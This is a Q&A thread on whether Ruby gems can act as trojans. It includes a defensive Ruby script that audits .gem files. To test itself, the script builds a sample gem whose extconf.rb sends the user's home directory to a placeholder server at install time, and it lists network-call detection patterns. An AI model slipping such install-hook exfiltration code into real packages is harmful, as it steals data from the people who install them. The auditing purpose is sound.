 

Is there a risk of a Ruby gem acting like a trojan?

I was just about to install a Ruby gem by someone I hadn't heard of. But something made me think "Who is this guy?". Is there any risk of a Ruby gem accessing private data on your machine and transmitting it elsewhere - since the gem system has Internet access? Or are there protections against this?

Hola asked Jun 04 '09 21:06


3 Answers

Of course there is. You're installing software on your computer that runs with the privileges of the script/user that calls it. It's probably easier to spot malicious code in pure Ruby than in binary packages. But if you think source inspection is a guaranteed way to spot malicious code, check out the Underhanded C Contest.

That said, if you want to write malware there are more effective delivery systems than Ruby gems. I would not be surprised if the number of actual malicious gems in existence is 0, and thus that the probability that this one is malicious is likewise 0...

See: http://rubygems.org/read/chapter/14#page61

Steve Jessop answered Oct 19 '22 16:10


There is a risk of malicious code whenever you import unknown logic into an application. The risks are only as deep as the data to which that application has access. Like how Java applets are sandboxed.

Get signed packages you trust, or look at the source.

Aiden Bell answered Oct 19 '22 16:10
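As an added example, not code from the question or from any of the answers: what "look at the source" and "signed packages you trust" come down to for a gem you have fetched but not yet installed. The script builds a constructed sample gem whose extconf.rb posts data to a server during installation, then audits the .gem archive the way you would audit one pulled with `gem fetch`. It relies on two RubyGems facts: `gem install` executes a gem's listed extension scripts (extconf.rb and friends) as the installing user, before the gem is ever required, and an unsigned gem has an empty cert_chain in its metadata. The gem name hello-trojan-demo, the URL, and the network/install-hook patterns are this example's own assumptions, not anything from the page.

```ruby
require "rubygems"
require "rubygems/package"
require "tmpdir"
require "fileutils"

# Heuristics used by this example (assumptions, not a RubyGems feature):
# calls that reach the network, and file names RubyGems runs at install time.
NETWORK_PATTERN   = /\b(Net::HTTP|open-uri|URI\.open|TCPSocket|`curl |`wget )/
INSTALL_HOOK_NAME = %r{(^|/)(extconf\.rb|Rakefile|mkrf_conf\.rb)$}

# Audit a .gem file without installing it. Returns an array of finding strings.
def audit_gem(gem_path)
  package  = Gem::Package.new(gem_path)
  spec     = package.spec            # parses metadata.gz; executes nothing
  findings = []

  # `gem install` runs each listed extension script (extconf.rb etc.) as the
  # installing user, before the gem is ever required.
  extensions = Array(spec.extensions)
  unless extensions.empty?
    findings << "runs code at install time via extensions: #{extensions.join(', ')}"
  end

  # Executables are put on PATH: another way to get run without `require`.
  executables = Array(spec.executables)
  unless executables.empty?
    findings << "installs executables: #{executables.join(', ')}"
  end

  # A signed gem carries the signer's certificate chain; an unsigned one carries
  # nothing that ties it to an author you could choose to trust.
  findings << "unsigned (no cert_chain)" if Array(spec.cert_chain).empty?

  # Unpack data.tar.gz into a scratch directory and scan every file for network
  # use; a hit inside an install-time script is the trojan pattern asked about.
  Dir.mktmpdir do |dir|
    package.extract_files(dir)
    Dir.glob(File.join(dir, "**", "*")).sort.each do |path|
      next unless File.file?(path)
      rel   = path.sub("#{dir}/", "")
      match = NETWORK_PATTERN.match(File.read(path))
      next unless match
      hook  = extensions.include?(rel) || rel =~ INSTALL_HOOK_NAME
      findings << "#{hook ? 'install-time script ' : ''}#{rel} uses the network (#{match[0].strip})"
    end
  end

  findings
end

# Build a constructed sample gem in `dir` (hypothetical, not a published gem)
# whose extconf.rb posts the user's home directory to a server during install.
def build_sample_gem(dir)
  Dir.chdir(dir) do
    FileUtils.mkdir_p("lib")
    FileUtils.mkdir_p("ext/hello")
    File.write("lib/hello.rb", "module Hello; end\n")
    File.write("ext/hello/extconf.rb", <<~RUBY)
      require "mkmf"
      require "net/http"
      # executed by 'gem install' as the installing user, before anything is required
      Net::HTTP.post_form(URI("http://example.invalid/collect"), "home" => Dir.home)
      create_makefile("hello")
    RUBY

    spec = Gem::Specification.new do |s|
      s.name       = "hello-trojan-demo"   # hypothetical name
      s.version    = "0.0.1"
      s.summary    = "constructed sample for auditing"
      s.authors    = ["unknown"]
      s.files      = ["lib/hello.rb", "ext/hello/extconf.rb"]
      s.extensions = ["ext/hello/extconf.rb"]
    end
    Gem::Package.build(spec, true)   # skip validation; this gem is never installed
    File.join(dir, spec.file_name)
  end
end

if __FILE__ == $PROGRAM_NAME
  # Usage: ruby audit_gem.rb some-gem-1.2.3.gem (e.g. after `gem fetch some-gem`);
  # with no argument, build and audit the constructed sample instead.
  Dir.mktmpdir do |dir|
    gem_file = ARGV[0] || build_sample_gem(dir)
    audit_gem(gem_file).each { |finding| puts "- #{finding}" }
  end
end
```

Run it with a .gem path (`gem fetch NAME` downloads a gem without installing it) or with no argument to see the sample flagged. A network hit inside an install-time script is the case that matters most, because that code runs the moment you type `gem install`, not when you first `require` the gem. `gem install -P HighSecurity` refuses anything without a valid signature, which is the "signed packages you trust" option in practice.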


If I wanted to get a handle on the likelihood of a malicious gem occurring, I'd look at whether malicious packages have been detected in any language (e.g. Python eggs, or Perl's CPAN), how likely it is that a malicious package has been produced without anyone noticing, and whether Ruby is at any greater risk than other languages.

I might see if I could generate a web of trust - even if I don't know the gem author, do I know someone who does?

I might also look at whether package managers such as Debian examine whether packages are malicious, and if so, whether they've examined the gem you want to use.

Andrew Grimm answered Oct 19 '22 17:10